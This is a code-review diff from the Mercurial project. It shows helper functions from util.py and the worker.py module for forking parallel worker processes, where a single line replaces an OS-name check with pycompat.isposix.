3808 3808 # We need to format the docstring. So use a dummy object/type to hold it
3809 3809 # rather than mutating the original.
3810 3810 class docobject(object):
3811 3811 pass
3812 3812
3813 3813 for name in compengines:
3814 3814 engine = compengines[name]
3815 3815
3816 3816 if not engine.available():
3817 3817 continue
3818 3818
3819 3819 bt = engine.bundletype()
3820 3820 if not bt or not bt[0]:
3821 3821 continue
3822 3822
3823 3823 doc = pycompat.sysstr('``%s``\n %s') % (
3824 3824 bt[0], engine.bundletype.__doc__)
3825 3825
3826 3826 value = docobject()
3827 3827 value.__doc__ = doc
3828 3828 value._origdoc = engine.bundletype.__doc__
3829 3829 value._origfunc = engine.bundletype
3830 3830
3831 3831 items[bt[0]] = value
3832 3832
3833 3833 return items
3834 3834
3835 3835 i18nfunctions = bundlecompressiontopics().values()
3836 3836
3837 3837 # convenient shortcut
3838 3838 dst = debugstacktrace
3839 3839
3840 3840 def safename(f, tag, ctx, others=None):
3841 3841 """
3842 3842 Generate a name that it is safe to rename f to in the given context.
3843 3843
3844 3844 f: filename to rename
3845 3845 tag: a string tag that will be included in the new name
3846 3846 ctx: a context, in which the new name must not exist
3847 3847 others: a set of other filenames that the new name must not be in
3848 3848
3849 3849 Returns a file name of the form oldname~tag[~number] which does not exist
3850 3850 in the provided context and is not in the set of other names.
3851 3851 """
3852 3852 if others is None:
3853 3853 others = set()
3854 3854
3855 3855 fn = '%s~%s' % (f, tag)
3856 3856 if fn not in ctx and fn not in others:
3857 3857 return fn
3858 3858 for n in itertools.count(1):
3859 3859 fn = '%s~%s~%s' % (f, tag, n)
3860 3860 if fn not in ctx and fn not in others:
3861 3861 return fn
@@ -1,240 +1,240 b''
1 1 # worker.py - master-slave parallelism support
2 2 #
3 3 # Copyright 2013 Facebook, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import errno
11 11 import os
12 12 import signal
13 13 import sys
14 14
15 15 from .i18n import _
16 16 from . import (
17 17 encoding,
18 18 error,
19 19 pycompat,
20 20 scmutil,
21 21 util,
22 22 )
23 23
24 24 def countcpus():
25 25 '''try to count the number of CPUs on the system'''
26 26
27 27 # posix
28 28 try:
29 29 n = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
30 30 if n > 0:
31 31 return n
32 32 except (AttributeError, ValueError):
33 33 pass
34 34
35 35 # windows
36 36 try:
37 37 n = int(encoding.environ['NUMBER_OF_PROCESSORS'])
38 38 if n > 0:
39 39 return n
40 40 except (KeyError, ValueError):
41 41 pass
42 42
43 43 return 1
44 44
45 45 def _numworkers(ui):
46 46 s = ui.config('worker', 'numcpus')
47 47 if s:
48 48 try:
49 49 n = int(s)
50 50 if n >= 1:
51 51 return n
52 52 except ValueError:
53 53 raise error.Abort(_('number of cpus must be an integer'))
54 54 return min(max(countcpus(), 4), 32)
55 55
56 if pycompat.osname == 'posix':
56 if pycompat.isposix:
57 57 _startupcost = 0.01
58 58 else:
59 59 _startupcost = 1e30
60 60
61 61 def worthwhile(ui, costperop, nops):
62 62 '''try to determine whether the benefit of multiple processes can
63 63 outweigh the cost of starting them'''
64 64 linear = costperop * nops
65 65 workers = _numworkers(ui)
66 66 benefit = linear - (_startupcost * workers + linear / workers)
67 67 return benefit >= 0.15
68 68
69 69 def worker(ui, costperarg, func, staticargs, args):
70 70 '''run a function, possibly in parallel in multiple worker
71 71 processes.
72 72
73 73 returns a progress iterator
74 74
75 75 costperarg - cost of a single task
76 76
77 77 func - function to run
78 78
79 79 staticargs - arguments to pass to every invocation of the function
80 80
81 81 args - arguments to split into chunks, to pass to individual
82 82 workers
83 83 '''
84 84 if worthwhile(ui, costperarg, len(args)):
85 85 return _platformworker(ui, func, staticargs, args)
86 86 return func(*staticargs + (args,))
87 87
88 88 def _posixworker(ui, func, staticargs, args):
89 89 rfd, wfd = os.pipe()
90 90 workers = _numworkers(ui)
91 91 oldhandler = signal.getsignal(signal.SIGINT)
92 92 signal.signal(signal.SIGINT, signal.SIG_IGN)
93 93 pids, problem = set(), [0]
94 94 def killworkers():
95 95 # unregister SIGCHLD handler as all children will be killed. This
96 96 # function shouldn't be interrupted by another SIGCHLD; otherwise pids
97 97 # could be updated while iterating, which would cause inconsistency.
98 98 signal.signal(signal.SIGCHLD, oldchldhandler)
99 99 # if one worker bails, there's no good reason to wait for the rest
100 100 for p in pids:
101 101 try:
102 102 os.kill(p, signal.SIGTERM)
103 103 except OSError as err:
104 104 if err.errno != errno.ESRCH:
105 105 raise
106 106 def waitforworkers(blocking=True):
107 107 for pid in pids.copy():
108 108 p = st = 0
109 109 while True:
110 110 try:
111 111 p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
112 112 break
113 113 except OSError as e:
114 114 if e.errno == errno.EINTR:
115 115 continue
116 116 elif e.errno == errno.ECHILD:
117 117 # child would already be reaped, but pids yet been
118 118 # updated (maybe interrupted just after waitpid)
119 119 pids.discard(pid)
120 120 break
121 121 else:
122 122 raise
123 123 if not p:
124 124 # skip subsequent steps, because child process should
125 125 # be still running in this case
126 126 continue
127 127 pids.discard(p)
128 128 st = _exitstatus(st)
129 129 if st and not problem[0]:
130 130 problem[0] = st
131 131 def sigchldhandler(signum, frame):
132 132 waitforworkers(blocking=False)
133 133 if problem[0]:
134 134 killworkers()
135 135 oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
136 136 ui.flush()
137 137 parentpid = os.getpid()
138 138 for pargs in partition(args, workers):
139 139 # make sure we use os._exit in all worker code paths. otherwise the
140 140 # worker may do some clean-ups which could cause surprises like
141 141 # deadlock. see sshpeer.cleanup for example.
142 142 # override error handling *before* fork. this is necessary because
143 143 # exception (signal) may arrive after fork, before "pid =" assignment
144 144 # completes, and other exception handler (dispatch.py) can lead to
145 145 # unexpected code path without os._exit.
146 146 ret = -1
147 147 try:
148 148 pid = os.fork()
149 149 if pid == 0:
150 150 signal.signal(signal.SIGINT, oldhandler)
151 151 signal.signal(signal.SIGCHLD, oldchldhandler)
152 152
153 153 def workerfunc():
154 154 os.close(rfd)
155 155 for i, item in func(*(staticargs + (pargs,))):
156 156 os.write(wfd, '%d %s\n' % (i, item))
157 157 return 0
158 158
159 159 ret = scmutil.callcatch(ui, workerfunc)
160 160 except: # parent re-raises, child never returns
161 161 if os.getpid() == parentpid:
162 162 raise
163 163 exctype = sys.exc_info()[0]
164 164 force = not issubclass(exctype, KeyboardInterrupt)
165 165 ui.traceback(force=force)
166 166 finally:
167 167 if os.getpid() != parentpid:
168 168 try:
169 169 ui.flush()
170 170 except: # never returns, no re-raises
171 171 pass
172 172 finally:
173 173 os._exit(ret & 255)
174 174 pids.add(pid)
175 175 os.close(wfd)
176 176 fp = os.fdopen(rfd, pycompat.sysstr('rb'), 0)
177 177 def cleanup():
178 178 signal.signal(signal.SIGINT, oldhandler)
179 179 waitforworkers()
180 180 signal.signal(signal.SIGCHLD, oldchldhandler)
181 181 status = problem[0]
182 182 if status:
183 183 if status < 0:
184 184 os.kill(os.getpid(), -status)
185 185 sys.exit(status)
186 186 try:
187 187 for line in util.iterfile(fp):
188 188 l = line.split(' ', 1)
189 189 yield int(l[0]), l[1][:-1]
190 190 except: # re-raises
191 191 killworkers()
192 192 cleanup()
193 193 raise
194 194 cleanup()
195 195
196 196 def _posixexitstatus(code):
197 197 '''convert a posix exit status into the same form returned by
198 198 os.spawnv
199 199
200 200 returns None if the process was stopped instead of exiting'''
201 201 if os.WIFEXITED(code):
202 202 return os.WEXITSTATUS(code)
203 203 elif os.WIFSIGNALED(code):
204 204 return -os.WTERMSIG(code)
205 205
206 206 if not pycompat.iswindows:
207 207 _platformworker = _posixworker
208 208 _exitstatus = _posixexitstatus
209 209
210 210 def partition(lst, nslices):
211 211 '''partition a list into N slices of roughly equal size
212 212
213 213 The current strategy takes every Nth element from the input. If
214 214 we ever write workers that need to preserve grouping in input
215 215 we should consider allowing callers to specify a partition strategy.
216 216
217 217 mpm is not a fan of this partitioning strategy when files are involved.
218 218 In his words:
219 219
220 220 Single-threaded Mercurial makes a point of creating and visiting
221 221 files in a fixed order (alphabetical). When creating files in order,
222 222 a typical filesystem is likely to allocate them on nearby regions on
223 223 disk. Thus, when revisiting in the same order, locality is maximized
224 224 and various forms of OS and disk-level caching and read-ahead get a
225 225 chance to work.
226 226
227 227 This effect can be quite significant on spinning disks. I discovered it
228 228 circa Mercurial v0.4 when revlogs were named by hashes of filenames.
229 229 Tarring a repo and copying it to another disk effectively randomized
230 230 the revlog ordering on disk by sorting the revlogs by hash and suddenly
231 231 performance of my kernel checkout benchmark dropped by ~10x because the
232 232 "working set" of sectors visited no longer fit in the drive's cache and
233 233 the workload switched from streaming to random I/O.
234 234
235 235 What we should really be doing is have workers read filenames from a
236 236 ordered queue. This preserves locality and also keeps any worker from
237 237 getting more than one file out of balance.
238 238 '''
239 239 for i in range(nslices):
240 240 yield lst[i::nslices]
General Comments 0
You need to be logged in to leave comments. Login now